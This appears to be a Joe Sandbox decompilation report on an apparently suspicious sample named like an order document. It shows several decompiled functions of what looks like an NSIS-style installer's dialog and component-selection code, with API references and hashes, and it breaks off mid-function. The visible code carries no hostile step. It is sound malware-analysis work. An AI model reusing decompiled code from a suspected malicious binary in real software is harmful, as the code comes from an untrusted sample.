Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 0040418F Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040418F(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x424728, 0x28, _a4, 1); // executed
				return _t2;
			}

0x0040419d
0x004041a3

APIs

SendMessageA.USER32(00000028,?,00000001,00403FBF), ref: 0040419D

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1c02a5868d14bc1e19ebeed3d404449871defacebd96b9282790bb16d711c782
Instruction ID: 10cfd25431557a88665167ebbf17620150c727a9bd7140e907e4ecff4ccdfc3e
Opcode Fuzzy Hash: 1c02a5868d14bc1e19ebeed3d404449871defacebd96b9282790bb16d711c782
Instruction Fuzzy Hash: 30B09236280A00AAEE218B00DE09F457AA2E7A8742F028028B250240B0CAB200A1DB08

Uniqueness

Uniqueness Score: -1.00%

Function 0040417C Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040417C(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x420d2c, _a4); // executed
				return _t2;
			}

0x00404186
0x0040418c

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F58), ref: 00404186

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 170f1306ebf328c26108ef1010d48ef1549a1a3b4841237e6a0462b6e89b4d13
Instruction ID: bd711969ba89efe8629f231cafa01baa053f2358784498ab8b3cf30639ef5a41
Opcode Fuzzy Hash: 170f1306ebf328c26108ef1010d48ef1549a1a3b4841237e6a0462b6e89b4d13
Instruction Fuzzy Hash: 55A012320000009FCB014B50EF04C057F71AB543007018435E140400338A310821FF0C

Uniqueness

Uniqueness Score: -1.00%

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D6(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402A9F(_t7);
				 *((intOrPtr*)(_t13 - 0x3c)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d6
0x004014d7
0x004014e0
0x004014e3
0x004014e7
0x004014e7
0x004014e9
0x00402954
0x00402960

APIs

Sleep.KERNELBASE(00000000), ref: 004014E9

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c0e700f1fcdc4ffa98e8290517b670d0cf04be8f77536005ba3f54c52213854c
Instruction ID: 570e0916f0090f26c7ee0a6088be2661e77b817c4cb0ee023996dcc8b23dd1f7
Opcode Fuzzy Hash: c0e700f1fcdc4ffa98e8290517b670d0cf04be8f77536005ba3f54c52213854c
Instruction Fuzzy Hash: 96D05E73B141518BD754EBB9BA8845E73E4EB903153214837E852E2091EA78C8424A28

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404B3D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00404B3D(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				int _t194;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t277;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				int _t295;
				int _t296;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageA;
				_v20 =  *0x424768;
				_t282 = 0;
				_v24 =  *0x424734 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42473d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404A8B(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42473c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x420d14; // 0x0
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x420d28; // 0x0
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x420d14 = _t282;
								 *0x420d28 = _t282;
								 *0x4247a0 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42473d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404B0B();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_t194 =  *0x420d28; // 0x0
									_v32 = _t194;
									_t195 =  *0x424768;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42476c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										_t197 =  *0x423efc; // 0x4f060e
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E00404A46(0x3ff, 0xfffffffb, E00404A5E(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x106]);
									} while (_v20 <  *0x42476c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x420d28);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageA(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageA(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x4247a0 = _t306;
					 *0x420d28 = GlobalAlloc(0x40,  *0x42476c << 2);
					_t252 = LoadBitmapA( *0x424720, 0x6e);
					 *0x420d1c =  *0x420d1c | 0xffffffff;
					_t313 = _t252;
					 *0x420d24 = SetWindowLongA(_v8, 0xfffffffc, E00405134);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420d14 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x420d14);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E004060BB(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E0040415A(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E0040415A(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42476c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84);
										_t295 =  *0x420d28; // 0x0
										 *(_t295 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_t296 =  *0x420d28; // 0x0
									_v32 = 1;
									 *(_t296 + _t316 * 4) = _t276;
									_t277 =  *0x420d28; // 0x0
									_t284 =  *(_t277 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_v28 = _t302;
						} while (_t316 <  *0x42476c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040418F(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040418F(_v12);
								L91:
								return E004041C1(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404b4c
0x00404b5d
0x00404b62
0x00404b6a
0x00404b70
0x00404b78
0x00404b86
0x00404b89
0x00404da9
0x00404db0
0x00404dc4
0x00404db2
0x00404db4
0x00404db7
0x00404db8
0x00404dbf
0x00404dbf
0x00404dd0
0x00404dde
0x00404de1
0x00404df7
0x00404e6c
0x00404e6f
0x00404e71
0x00404e7b
0x00404e89
0x00404e89
0x00404e8b
0x00404e95
0x00404e9b
0x00404e9e
0x00404ea1
0x00404ebc
0x00404ea3
0x00404ead
0x00404ead
0x00404ea1
0x00404e95
0x00000000
0x00404e6f
0x00404dfc
0x00404e07
0x00404e0c
0x00404e13
0x00404e18
0x00404e1c
0x00404e27
0x00404e27
0x00404e2b
0x00404e2f
0x00404e33
0x00404e46
0x00404e35
0x00404e35
0x00404e3c
0x00404e42
0x00404e3e
0x00404e3e
0x00404e3e
0x00404e3c
0x00404e4a
0x00404e4c
0x00404e5f
0x00404e62
0x00404e65
0x00404e65
0x00404e2f
0x00000000
0x00404e1c
0x00404dfe
0x00404e05
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ebf
0x00404ebf
0x00404ec6
0x00404f37
0x00404f3f
0x00404f47
0x00404f47
0x00404f50
0x00404f52
0x00404f59
0x00404f5c
0x00404f5c
0x00404f62
0x00404f69
0x00404f6c
0x00404f6c
0x00404f72
0x00404f78
0x00404f7e
0x00404f7e
0x00404f8b
0x004050e1
0x004050e8
0x00405105
0x0040510b
0x0040511d
0x0040511d
0x00000000
0x00404f91
0x00404f93
0x00404f98
0x00404f9d
0x00404fa2
0x00404fa4
0x00404fa4
0x00404fa5
0x00404fa6
0x00404fa8
0x00404fa8
0x00404fb0
0x00404ff1
0x00404ff3
0x00404ff8
0x00405003
0x00405006
0x0040500b
0x00405012
0x00405015
0x004050b7
0x004050bd
0x004050c3
0x004050cb
0x004050dc
0x004050dc
0x00000000
0x004050cb
0x0040501b
0x0040501e
0x00405024
0x00405029
0x0040502b
0x0040502d
0x00405033
0x0040503a
0x0040503f
0x00405046
0x00405049
0x00405049
0x00405050
0x0040505c
0x00405060
0x00405062
0x00405062
0x00405052
0x00405054
0x00405054
0x00405082
0x0040508e
0x0040509d
0x0040509d
0x0040509f
0x004050a2
0x004050ab
0x00000000
0x00404fb2
0x00404fbd
0x00404fc0
0x00404fc5
0x00404fc7
0x00404fcb
0x00404fdb
0x00404fe5
0x00404fe7
0x00404fea
0x00000000
0x00000000
0x00000000
0x00000000
0x00404fcd
0x00404fcd
0x00404fd3
0x00404fd5
0x00404fd5
0x00404fd6
0x00404fd7
0x00000000
0x00404fcd
0x00404fb0
0x00404f8b
0x00404ece
0x00000000
0x00404ee4
0x00404eee
0x00404ef3
0x00000000
0x00000000
0x00404f05
0x00404f0a
0x00404f16
0x00404f16
0x00404f18
0x00404f27
0x00404f29
0x00404f2d
0x00404f30
0x00000000
0x00404f30
0x00404ece
0x00404b8f
0x00404b94
0x00404b9d
0x00404ba4
0x00404bb2
0x00404bbd
0x00404bc3
0x00404bd1
0x00404be5
0x00404bea
0x00404bf7
0x00404bfc
0x00404c12
0x00404c23
0x00404c30
0x00404c30
0x00404c33
0x00404c39
0x00404c3b
0x00404c3e
0x00404c43
0x00404c48
0x00404c4a
0x00404c4a
0x00404c6a
0x00404c6a
0x00404c6c
0x00404c6d
0x00404c72
0x00404c75
0x00404c78
0x00404c7c
0x00404c81
0x00404c86
0x00404c8a
0x00404c8f
0x00404c94
0x00404c96
0x00404c9e
0x00404d68
0x00404d7b
0x00000000
0x00404ca4
0x00404ca7
0x00404caa
0x00404cad
0x00404cad
0x00404cb3
0x00404cb9
0x00404cbc
0x00404cc2
0x00404cc3
0x00404cc8
0x00404cd1
0x00404cd8
0x00404cdb
0x00404cde
0x00404ce1
0x00404d1d
0x00404d3e
0x00404d40
0x00404d46
0x00404d1f
0x00404d2c
0x00404d2c
0x00404ce3
0x00404ce6
0x00404cf5
0x00404cff
0x00404d01
0x00404d07
0x00404d0e
0x00404d11
0x00404d16
0x00404d16
0x00404ce1
0x00404d4c
0x00404d4d
0x00404d59
0x00404d59
0x00404d66
0x00404d81
0x00404d85
0x00404da2
0x00404da7
0x00000000
0x00404d87
0x00404d8c
0x00404d95
0x0040511f
0x00405131
0x00405131
0x00404d85
0x00000000
0x00404d66
0x00404c9e

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B55
GetDlgItem.USER32(?,00000408), ref: 00404B60
GlobalAlloc.KERNEL32(00000040,?), ref: 00404BAA
LoadBitmapA.USER32(0000006E), ref: 00404BBD
SetWindowLongA.USER32(?,000000FC,00405134), ref: 00404BD6
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BEA
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BFC
SendMessageA.USER32(?,00001109,00000002), ref: 00404C12
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C1E
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C30
DeleteObject.GDI32(00000000), ref: 00404C33
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C5E
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C6A
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404CFF
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404D2A
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D3E
GetWindowLongA.USER32(?,000000F0), ref: 00404D6D
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404D7B
ShowWindow.USER32(?,00000005), ref: 00404D8C
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404E89
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404EEE
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F03
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F27
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F47
ImageList_Destroy.COMCTL32(00000000), ref: 00404F5C
GlobalFree.KERNEL32(00000000), ref: 00404F6C
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404FE5
SendMessageA.USER32(?,00001102,?,?), ref: 0040508E
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040509D
InvalidateRect.USER32(?,00000000,00000001), ref: 004050BD
ShowWindow.USER32(?,00000000), ref: 0040510B
GetDlgItem.USER32(?,000003FE), ref: 00405116
ShowWindow.USER32(00000000), ref: 0040511D

Strings

M, xrefs: 00404CE6
, xrefs: 004050F5
N, xrefs: 00404DC7

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 21234ef24cb517e62b6e681d72db919925f617bec669e1fe45a086f5b61beedf
Instruction ID: d82d2da19de6c08df5f7af85b096481c441aefc445292f149536e1611d4f21ae
Opcode Fuzzy Hash: 21234ef24cb517e62b6e681d72db919925f617bec669e1fe45a086f5b61beedf
Instruction Fuzzy Hash: 080241B0A00209AFDB209F95DD85AAE7BB5FB84314F10417AF611BA2E1C7799D42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004045CA Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004045CA(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;
				void* _t205;

				_t156 = __edx;
				_t82 =  *0x420508; // 0x4edb2c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405799(0x3fb, _t146);
					E00406303(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405799(0x3fb, _t146);
							if(E00405B1F(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00406099(0x41fd00, _t146);
							_t87 = E00406431(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406099(0x41fd00, _t146);
								_t89 = E00405ACA(0x41fd00);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41fd00,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41fd00) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41fd00,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405A78(0x41fd00);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41fd00) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404A5E(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x423efc; // 0x4f060e
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404A46(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41fcf0);
									} else {
										E00404981(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x4247e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E0040417C(0 | _v8 == _t158);
								if(_v8 == _t158) {
									_t205 =  *0x420d20 - _t158; // 0x0
									if(_t205 == 0) {
										E00404523();
									}
								}
								 *0x420d20 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420d30;
							_v60 = E0040491B;
							_v56 = _t146;
							_v68 = E004060BB(_t146, 0x420d30, _t166, 0x420108, _v12);
